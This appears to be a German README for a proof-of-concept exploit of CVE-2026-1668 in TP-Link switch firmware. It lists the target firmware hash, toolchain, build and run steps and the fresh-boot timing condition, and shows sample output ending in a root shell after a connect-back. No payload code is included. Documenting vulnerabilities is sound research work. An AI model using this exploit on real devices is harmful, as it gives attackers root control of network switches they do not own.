
Proof-of-Concept-Exploit für CVE-2026-1668 in der TP-Link-Switch-Firmware, das eine MIPS-Payload liefert, die eine Root-Shell auf anfälligen Geräten ermöglicht.
Dies ist ein Proof-of-Concept-Exploit für CVE-2026-1668. Er ist ausschließlich für Bildungszwecke gedacht. Bitte versuchen Sie nicht, Systeme auszunutzen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zur Ausnutzung haben.
Dieser Proof-of-Concept wurde gegen ein Firmware-Image mit dem folgenden SHA256-Hash entwickelt: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544.
Namen von Firmwares, die bekanntermaßen zu diesem Hash passen (nicht erschöpfend):
Frühere Firmware-Versionen sind wahrscheinlich ebenfalls anfällig, erfordern jedoch möglicherweise geringfügige Änderungen an der Exploit-Payload.
Eine Erklärung, wie die Payload funktioniert, finden Sie in diesem Blogbeitrag.
Zum Erstellen der Payload ist eine MIPS-Linux-GCC-Toolchain erforderlich. Unter Ubuntu 24.04 kann eine mit sudo apt install gcc-mips-linux-gnu installiert werden.
$ make
Dieser Exploit muss ausgeführt werden, bevor der HTTP-Server seine erste Anfrage bedient hat (d. h. bei einem frischen Start).
$ ./run.sh
Das Skript sollte Sie zu einer Root-Shell bringen. Falls nicht, ist der Exploit fehlgeschlagen.
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json
{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc #